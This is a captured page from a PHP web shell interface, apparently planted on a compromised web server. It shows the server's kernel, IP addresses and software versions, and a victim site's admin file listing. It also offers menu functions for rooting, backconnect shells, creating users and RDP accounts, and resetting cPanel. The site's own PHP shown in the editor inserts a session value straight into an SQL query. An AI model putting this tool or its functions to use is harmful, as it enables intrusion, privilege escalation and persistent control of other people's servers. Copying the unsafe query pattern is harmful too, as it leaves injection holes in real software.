Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.129.253.54
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
mewika.com /
admin /
PageWrapper /
[ HOME SHELL ]
Name
Size
Permission
Action
PageWrapper_0NotFound.php
498
B
-rw-r--r--
PageWrapper_0NotFound_New.php
317
B
-rw-r--r--
PageWrapper_1Home.php
4.44
KB
-rw-r--r--
PageWrapper_1Home_Edit.php
4.54
KB
-rw-r--r--
PageWrapper_1Home_List.php
4.11
KB
-rw-r--r--
PageWrapper_1Home_Profile.php
8.91
KB
-rw-r--r--
PageWrapper_AmphurList.php
3.98
KB
-rw-r--r--
PageWrapper_Category_Content.p...
1.82
KB
-rw-r--r--
PageWrapper_Category_Content_E...
2.85
KB
-rw-r--r--
PageWrapper_Category_Content_L...
3.5
KB
-rw-r--r--
PageWrapper_Category_Content_L...
4.05
KB
-rw-r--r--
PageWrapper_Category_Content_L...
668
B
-rw-r--r--
PageWrapper_Category_Content_L...
5.71
KB
-rw-r--r--
PageWrapper_Category_Content_L...
4.34
KB
-rw-r--r--
PageWrapper_Management_Content...
17.58
KB
-rw-r--r--
PageWrapper_Management_Content...
5.71
KB
-rw-r--r--
PageWrapper_Management_Content...
1.72
KB
-rw-r--r--
PageWrapper_Management_Content...
6.91
KB
-rw-r--r--
PageWrapper_MemberList.php
6.29
KB
-rw-r--r--
PageWrapper_NotFound.php
312
B
-rw-r--r--
PageWrapper_Product.php
10.07
KB
-rw-r--r--
PageWrapper_ProductEdut.php
20.96
KB
-rw-r--r--
PageWrapper_ProductProfile.php
3.63
KB
-rw-r--r--
PageWrapper_Product_Category.p...
2.59
KB
-rw-r--r--
PageWrapper_Product_Category2....
2.24
KB
-rw-r--r--
PageWrapper_Product_Category3....
4.45
KB
-rw-r--r--
PageWrapper_Product_CategoryEd...
3.2
KB
-rw-r--r--
PageWrapper_Product_CategoryEd...
3.68
KB
-rw-r--r--
PageWrapper_Product_CategoryEd...
7.98
KB
-rw-r--r--
PageWrapper_Product_Category_L...
3.58
KB
-rw-r--r--
PageWrapper_Product_Category_L...
5.87
KB
-rw-r--r--
PageWrapper_Product_Category_L...
4.59
KB
-rw-r--r--
PageWrapper_Product_Dash_Board...
2.97
KB
-rw-r--r--
PageWrapper_Product_Dash_Board...
3.28
KB
-rw-r--r--
PageWrapper_Product_Dash_Board...
10.1
KB
-rw-r--r--
PageWrapper_Product_List.php
5.7
KB
-rw-r--r--
PageWrapper_Product_Property.p...
4.77
KB
-rw-r--r--
PageWrapper_Product_PropertyEd...
4.01
KB
-rw-r--r--
PageWrapper_Product_Property_L...
3.75
KB
-rw-r--r--
PageWrapper_Province.php
2.1
KB
-rw-r--r--
PageWrapper_Province_Edit.php
1.84
KB
-rw-r--r--
PageWrapper_Register.php
18.03
KB
-rw-r--r--
PageWrapper_RegisterEdit.php
20.56
KB
-rw-r--r--
PageWrapper_Register_ShowHome....
3.87
KB
-rw-r--r--
PageWrapper_Showpage.php
1.66
KB
-rw-r--r--
PageWrapper_ShowpageEdut.php
1.73
KB
-rw-r--r--
PageWrapper_Showpage_List.php
1.87
KB
-rw-r--r--
PageWrapper_SubDistrict.php
3.77
KB
-rw-r--r--
PageWrapper_SubDistrict_Add.ph...
3.35
KB
-rw-r--r--
PageWrapper_SubDistrict_Edit.p...
2.96
KB
-rw-r--r--
PageWrapper_System_PaymentEdut...
4.67
KB
-rw-r--r--
PageWrapper_amphur.php
2.41
KB
-rw-r--r--
PageWrapper_amphur_Edit.php
4.46
KB
-rw-r--r--
PageWrapper_contact.php
2.97
KB
-rw-r--r--
PageWrapper_contactview.php
3.97
KB
-rw-r--r--
PageWrapper_system_payment_lis...
2.3
KB
-rw-r--r--
StatusShowPage.php
473
B
-rw-r--r--
Text_Froala_Editor.php
2.14
KB
-rw-r--r--
Text_Froala_Editor2.php
1.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PageWrapper_1Home.php
<?PHP include '../model/controller/v_config.php'; $StatusShowPage = $_SESSION['ses_StatusShowPage']; $URL="HOME"; include 'PageWrapper/Text_Froala_Editor.php'; ?> <?PHP $SQL_Showpage =" SELECT StatusShowPage_ID,StatusShowPage_Name FROM status_showpage WHERE StatusShowPage_ID = $StatusShowPage "; $objQuery_Showpage= $objConnect->query($SQL_Showpage); while($objResult_Showpage= mysqli_fetch_array($objQuery_Showpage)) { $Chk_StatusShowPage_ID = $objResult_Showpage["StatusShowPage_ID"]; $Chk_StatusShowPage_Name = $objResult_Showpage["StatusShowPage_Name"]; } /* echo "Chk_StatusShowPage_ID: ".$Chk_StatusShowPage_ID; echo "<br/>Chk_StatusShowPage_Name: ".$Chk_StatusShowPage_Name; */ ?> <div id="page-wrapper"> <div class="row"> <div class="col-lg-12"> <h1 class="page-header"><?=$Chk_StatusShowPage_Name;?></h1> </div> </div> <div class="well well-lg"> <form name="personnel " method="POST" action="../model/controller/1Home_Add.php" enctype="multipart/form-data"> <input type="text" name="Teb" value="Add" hidden="hidden"/> <input type="text" name="Per_ID" value="0" hidden="hidden"/> <input type="text" name="StatusShowPageID" value="<?=$Chk_StatusShowPage_ID;?>" hidden="hidden"/> <?PHP include 'PageWrapper/TextEdit_nicEdit.php';?> <button type="submit" class="btn btn-primary"> <span class="glyphicon glyphicon-floppy-saved" aria-hidden="true"></span> Save</button> <br/> <br/> <div class="row"> <div class="col-md-2"><strong>Head : </strong></div> <div class="col-md-8"> <textarea name="Sub" class="form-control" rows="3" placeholder="Sub" required></textarea> </div> <div class="col-md-2"> </div> </div> <br/> <div class="row"> <div class="col-md-2"><strong>Brief Description : </strong></div> <div class="col-md-8"><textarea name="Short" class="form-control" rows="3" placeholder="Short" required></textarea></div> <div class="col-md-2"></div> </div> <br/> <div class="row"> <div class="col-md-2"><strong>Description : </strong></div> <div class="col-md-8"> <div id="sample"> <!--<textarea name="Detail" id="markItUp" cols="20" rows="15" class="form-control" rows="3" required> </textarea>--> <textarea name="Detail" id="edit" cols="20" rows="15" class="form-control" rows="3" required></textarea> </div> </div> <div class="col-md-2"></div> </div> <br/> <div class="row"> <div class="col-md-2"> <abbr title="image 300 Pixels x 300 Pixels"> <strong>image: </strong> </abbr> </div> <div class="col-md-8"> <input type="file" id="files" name="files[]" type="file" class="form-control" accept="image/jpg, image/jpeg, image/gif, image/png" required multiple/> <output id="list"></output> </div> <div class="col-md-2"> </div> </div> <br/> </form> </div> <?PHP include 'PageWrapper_1Home_List.php'; ?> </div> <script> function handleFileSelect(evt) { var files = evt.target.files; // Loop through the FileList and render image files as thumbnails. for (var i = 0, f; f = files[i]; i++) { // Only process image files. if (!f.type.match('image.*')) { continue; } var reader = new FileReader(); // Closure to capture the file information. reader.onload = (function(theFile) { return function(e) { // Render thumbnail. var span = document.createElement('span'); span.innerHTML = [ '<img style="height: 75px; border: 1px solid #000; margin: 5px" src="', e.target.result, '" title="', escape(theFile.name), '"/>' ].join(''); document.getElementById('list').insertBefore(span, null); }; })(f); // Read in the image file as a data URL. reader.readAsDataURL(f); } } document.getElementById('files').addEventListener('change', handleFileSelect, false); </script>
Close